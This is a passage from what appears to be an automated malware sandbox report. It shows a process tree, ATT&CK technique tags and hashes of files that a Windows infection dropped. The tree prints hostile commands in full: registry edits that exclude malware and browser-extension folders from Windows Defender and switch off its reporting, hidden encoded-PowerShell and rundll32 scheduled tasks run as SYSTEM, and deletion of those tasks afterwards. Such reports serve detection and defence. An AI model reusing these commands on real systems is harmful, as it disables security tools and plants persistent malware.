    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3864
  - - C:\Windows\SysWOW64\reg.exe
      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
      4⤵
      PID:4732
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4820
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AplGwAcKU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AplGwAcKU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KpccCTQHFwdaQGGjlLR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KpccCTQHFwdaQGGjlLR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\TewsSzADpkOsC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\TewsSzADpkOsC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZmXCVzpeviUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZmXCVzpeviUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hzVOasbgcFlU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hzVOasbgcFlU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\cAagwmwWSSyWmtVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\cAagwmwWSSyWmtVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\PPoGfHUEJWMQlhdih\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\PPoGfHUEJWMQlhdih\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\tisqMnSmFJrmHkYA\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\tisqMnSmFJrmHkYA\" /t REG_DWORD /d 0 /reg:64;"
  2⤵
  PID:2712
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AplGwAcKU" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:1784
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AplGwAcKU" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:624
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hzVOasbgcFlU2" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4376
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\cAagwmwWSSyWmtVB /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2888
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\PPoGfHUEJWMQlhdih /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1020
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\tisqMnSmFJrmHkYA /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1624
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\tisqMnSmFJrmHkYA /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5048
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\PPoGfHUEJWMQlhdih /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:3844
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4572
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:232
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:3316
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4764
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\cAagwmwWSSyWmtVB /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4724
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hzVOasbgcFlU2" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:1184
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZmXCVzpeviUn" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4568
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZmXCVzpeviUn" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4596
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TewsSzADpkOsC" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2268
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TewsSzADpkOsC" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2336
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KpccCTQHFwdaQGGjlLR" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4052
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KpccCTQHFwdaQGGjlLR" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:1888
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "gYpjQvyVd"
  2⤵
  PID:876
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "gYpjQvyVd" /SC once /ST 08:11:18 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
  2⤵
  - Creates scheduled task(s)
  PID:3516
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "XwMyCejzLOqQPkTJD" /SC once /ST 06:13:12 /RU "SYSTEM" /TR "\"C:\Windows\Temp\tisqMnSmFJrmHkYA\kiXpwMNefFEyhlW\PqsXXyT.exe\" Pt /BIsite_idEmm 385118 /S" /V1 /F
  2⤵
  - Creates scheduled task(s)
  PID:4060
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "XwMyCejzLOqQPkTJD"
  2⤵
  PID:3668
- - C:\Windows\SysWOW64\rundll32.exe
    C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\tisqMnSmFJrmHkYA\ZUNuiIjX\XDnOTiP.dll",#1 /Dtsite_idEJL 385118
    3⤵
    PID:3624
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /DELETE /F /TN "dHRDOHpkQTLgzSbMl"
      4⤵
      PID:2384
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "gYpjQvyVd"
  2⤵
  PID:4572

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:4352
- C:\Windows\system32\gpupdate.exe
  "C:\Windows\system32\gpupdate.exe" /force
  2⤵
  PID:624

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:5052

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:4140

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
1⤵
PID:1716

C:\Windows\Temp\tisqMnSmFJrmHkYA\kiXpwMNefFEyhlW\PqsXXyT.exe
C:\Windows\Temp\tisqMnSmFJrmHkYA\kiXpwMNefFEyhlW\PqsXXyT.exe Pt /BIsite_idEmm 385118 /S
1⤵
PID:988
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\AplGwAcKU\JjcZtI.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "rzGcUtIiGGHHJZZ" /V1 /F
  2⤵
  - Creates scheduled task(s)
  PID:4304
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
  2⤵
  PID:3864
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
  2⤵
  PID:4464
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "bvgvHgqNgKCzXIKVFa"
  2⤵
  PID:3412
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "rzGcUtIiGGHHJZZ"
  2⤵
  PID:984
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "rzGcUtIiGGHHJZZ"
  2⤵
  PID:4680
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "rzGcUtIiGGHHJZZ2" /F /xml "C:\Program Files (x86)\AplGwAcKU\lLEveiJ.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:1100
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "sqdcfvEhbfSqC2" /F /xml "C:\ProgramData\cAagwmwWSSyWmtVB\MIukfMB.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:2496
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "znkJCAEyDBfVBb" /F /xml "C:\Program Files (x86)\hzVOasbgcFlU2\nsZsNRw.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:960
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "kIZjYIiOiOcCcskeG2" /F /xml "C:\Program Files (x86)\KpccCTQHFwdaQGGjlLR\NAiQahL.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:4052
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "hLfWoLfTBNTItANDgYs2" /F /xml "C:\Program Files (x86)\TewsSzADpkOsC\CFwnJAn.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:3584
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "dHRDOHpkQTLgzSbMl"
  2⤵
  PID:3476
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "dHRDOHpkQTLgzSbMl" /SC once /ST 08:44:48 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\tisqMnSmFJrmHkYA\ZUNuiIjX\XDnOTiP.dll\",#1 /Dtsite_idEJL 385118" /V1 /F
  2⤵
  - Creates scheduled task(s)
  PID:380
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "XwMyCejzLOqQPkTJD"
  2⤵
  PID:2964
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
  2⤵
  PID:4876
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
  2⤵
  PID:400

C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
1⤵
PID:3648

C:\Windows\system32\rundll32.EXE
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\tisqMnSmFJrmHkYA\ZUNuiIjX\XDnOTiP.dll",#1 /Dtsite_idEJL 385118
1⤵
PID:3668

C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
1⤵
PID:4408

C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
1⤵
PID:1184

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 1936 -ip 1936
1⤵
PID:3096

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 1936 -ip 1936
1⤵
PID:552

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi

Filesize
243KB

MD5
e0b3b12e49b35e0ffc430c6e32f23dd5

SHA1
7be7df8ef9393bde7926cd452c11702da5fb94c3

SHA256
409eb8fbc0596ecf5cca277f4009519fbface6324031f9f320dd98df34839ea0

SHA512
20d0a138e854e3a02b78839440b17d05150dfbcff5edfcff28ec874912d84883348c66e42b9c0a1662e6727ad669453b073d3e91ea3b7cad804fd54ccb5bec3c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json

Filesize
187B

MD5
2a1e12a4811892d95962998e184399d8

SHA1
55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720

SHA256
32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb

SHA512
bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json

Filesize
136B

MD5
238d2612f510ea51d0d3eaa09e7136b1

SHA1
0953540c6c2fd928dd03b38c43f6e8541e1a0328

SHA256
801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e

SHA512
2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json

Filesize
150B

MD5
0b1cf3deab325f8987f2ee31c6afc8ea

SHA1
6a51537cef82143d3d768759b21598542d683904

SHA256
0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf

SHA512
5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
a9a1f3025a94c8eab47c24f54a807c81

SHA1
db0b9be717c91685b4a21f9b4196631c028c64e7

SHA256
c09c004d71c1e322f74cb6753ab2e6bf50db219964e8770f100f7c7ea60a7de4

SHA512
7c7a863ff2461fa9015c486487f66369ed0bd9f57df90f6e1c4ae2c0049eca46ffe6b7f62c8518b47c2987c34a077de5d2652edf9b3cf2bb7d1657906a7c4813

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
35KB

MD5
0e94c9d3bdcece15536eb7c18a126ef0

SHA1
14877b17f154cb87aaf072e8021388875998e18f

SHA256
e4194fe5d5410045c8549ba36a891d5684334d25d6a606a79b7e301823a3ec50

SHA512
a13a7f6a84132030bc1b24fe04619bc1f4cf011bb3597fdba38de23c93a2a2e5323ab8922cb8629f3881dec4e464848a37fc3e5ee0405db972fc5f67c976230c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log

Filesize
2KB

MD5
6cf293cb4d80be23433eecf74ddb5503

SHA1
24fe4752df102c2ef492954d6b046cb5512ad408

SHA256
b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

SHA512
0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
968cb9309758126772781b83adb8a28f

SHA1
8da30e71accf186b2ba11da1797cf67f8f78b47c

SHA256
92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

SHA512
4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.json

Filesize
151B

MD5
bd6b60b18aee6aaeb83b35c68fb48d88

SHA1
9b977a5fbf606d1104894e025e51ac28b56137c3

SHA256
b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55

SHA512
3500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
9KB

MD5
4c77799dd1766af20c901da70c38bab2

SHA1
d5b379a86351f0f0885b92bee0aaff612c85d629

SHA256
a25ad5e66ddbce5af3d3c12a0d7dcdccee639740549ec7140046fa78e6a6ae5d

SHA512
a19b9d85f292971015f8422c4439b32e203d6cc50f05e74b50cf53c6d244ee9807a4869b655fb895ce41b0c682d36df9a68647f110a54f523f66421c22f27dae

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
1cad83b81c759cff0daeba1e63e6e7c1

SHA1
74ffa32c4aee9c565c68da04c985914cf9ba65cb

SHA256
5ad13ea5fbab9e36894013f7cd431cb25c41ce3f200bfb8235f6d221319fdb8f

SHA512
c2dc44693744d2110ff5fc846ba811022e151691376988c844b70b7cd66784c52b474e59bf4bf6975990a57a98354c9c27e3ec1132c295b57b0064a362cfb39d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
13af6be1cb30e2fb779ea728ee0a6d67

SHA1
f33581ac2c60b1f02c978d14dc220dce57cc9562

SHA256
168561fb18f8eba8043fa9fc4b8a95b628f2cf5584e5a3b96c9ebaf6dd740e3f

SHA512
1159e1087bc7f7cbb233540b61f1bdecb161ff6c65ad1efc9911e87b8e4b2e5f8c2af56d67b33bc1f6836106d3fea8c750cc24b9f451acf85661e0715b829413

Download Submit
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\0k9x3hVgAIkYEYadyRTuzK6g.exe

Filesize
440KB

MD5
412617a54a701b372667d43d1e96a454

SHA1
2bfb25b33b1fc99fe8a4147b99f29ffdc75b392c

SHA256
5b4cbb14c63cd60ef31f66691ebc10ce392eff43a79f7a7bf40aa56f7c799265

SHA512
26219a5234f334c1c3773b9819c14c12c367cdeff339d75ba60948fe3b308610376cf3f56d661a4abb7ef197a0f8e4e956deb27b27c83d603cdc0842018e8483

Download Submit
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202402042050531\additional_file0.tmp

Filesize
21KB

MD5
23384d9c5a98a4afdb9d7f85287dc2b8

SHA1
bf39efd02abfc6bd40a825de25e584f394569b0e

SHA256
7ece1addfbf9b77da6312617d85fc5cc66be78707abe5c98509357dba3ad0761

SHA512
0026012b6c9658897f55439bc361750910d64066901811265be7f7bc19863c82a42ace2e429eb1cdcf3bc0716d597b4ac0cdf18c4a1eaf1da5528b5bd0affbb0

Download Submit
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202402042050531\assistant\Assistant_106.0.4998.16_Setup.exe_sfx.exe

Filesize
14KB

MD5
2c88fd3cd7b5cb1771f656230f3ff9ef

SHA1
aa552f4d10501a3d61fbbec5c01b11f6d01fa085

SHA256
acfd44b29d33f702b2eb83ef5fcd3f947bd7e708d1a6d3b162718477e224508b

SHA512
04d9fc27e42a17809a4a1434ac78009a211ed1658493d9e4151ec8733f6819c230568d7aa4f9f881c99d49abd1ea4e0acd1d39a1dc5541f74e31567267ba3d8e

Download Submit
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202402042050531\assistant\Assistant_106.0.4998.16_Setup.exe_sfx.exe

Filesize
6KB

MD5
685b1a9ccffbf375b44f86234be838eb

SHA1
74d718eb01a129741b65d141ef4aedea87f2e8f4

SHA256
f19c1e887f509057ae4dde2bcfcbb31976413705b0b16baa177a17d7e3a42831

SHA512
7fc03b6ea59b4ea233e5892113f3108f84f6492c837c77b9b853dcce581c229daa8c4dbe4abe3c7c666dbca5ab7427785dde07c01b8d2d1be6d3566fc9ae90ac

Download Submit
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202402042050531\assistant\assistant_installer.exe

Filesize
49KB

MD5
9a2c6af81fd2ef90fe24b60e3610a529

SHA1
058349841ead0674cb48f90a3833388f64eb710e

SHA256
f68f4368c49e124224fca865b092c0d6efbc6d79d3eca676e12fc7455fccad98

SHA512
acc4a682b740fbfe4d3f77f1dbdd6f8718d87496c7143745c54a13f001406bca3193d03e6ef3f85ce5c0a371d86077d40b0dd702ebb2fd9329de6c29612cb33f

Download Submit
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202402042050531\assistant\assistant_installer.exe

Filesize
1KB

MD5
978a5d7561b83228551ce8ce733f7b4c

SHA1
94878830a7d638bb5f0ea7f062030e8db5e7c1a5

SHA256
3c8adf8a82bdc897a2a2e5107984727c309694789226adaf23eec8b4a92a67b2

SHA512
16f024233c0bdba5aee4b316ec6743b6a794c0d2293e5864ca4c080c8ce921651d4f043da28df352ccbaec55d7ebd28012c9ee88d76afa62b93a04f5d6d1c428

Download Submit
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202402042050531\assistant\dbgcore.dll

Filesize
17KB

MD5
34a5d11d1d7810f0330cc2c3efb59ee5

SHA1
50524ade75497daa7ce0e073dd410375a82e3552

SHA256
7f0c4bbbc413d1f7c75e54a640e84e10c7654a0c34baf8236845b9d7b7696a42

SHA512
3357d9e2b41bb25d339a4baa6c48cd36daa00d0dad326583693c8e96d9d674d3abf92a6e78c77ff87f6993c203df04be2a1db6f66f877b381a801a3544732afe

Download Submit
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202402042050531\assistant\dbgcore.dll

Filesize
17KB

MD5
f9931441f1a319303683e98ce6d7a5e3

SHA1
1b11646821e9b93d8cc4c25607624f19f1a788fd

SHA256
8b4046d5351b621aa441dbe81dae20165b9d8342df2925af36024e61b4b081db

SHA512
